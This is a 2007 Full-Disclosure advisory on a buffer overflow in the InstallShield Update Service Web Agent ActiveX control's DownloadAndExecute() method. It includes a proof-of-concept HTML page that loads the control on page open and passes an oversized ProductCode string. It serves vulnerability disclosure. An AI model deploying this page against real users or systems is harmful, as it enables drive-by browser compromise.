installshield-overflow.txt
Posted on 25 December 2007
The InstallShield Update Service Web Agent version 5.1.100.47363 suffers from an exploitable buffer overflow in the ProductCode parameter of the DownloadAndExecute() function. This object is marked safe for scripting. Note that this issue appears to different from http://www.securityfocus.com/bid/26280(the iDefense advisory seems to be talking about insecure methods), however, the patch referenced in that issue fixes this issue as well since the update renders this object unsafe for scripting. PoC as follows: ----------------------- <!-- written by e.b. --> <html> <head> <script language="JavaScript" DEFER> function Check() { var s = 'A'; while (s.length <= 12000) s = s + 'A'; obj.Initialize("", "", "", ""); obj.DownloadAndExecute("", s, 0, "", ""); } </script> </head> <body onload="JavaScript: return Check();"> <object id="obj" classid="clsid:E9880553-B8A7-4960-A668-95C68BED571E" /> </object> </body> </html> ----------------------- Elazar _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
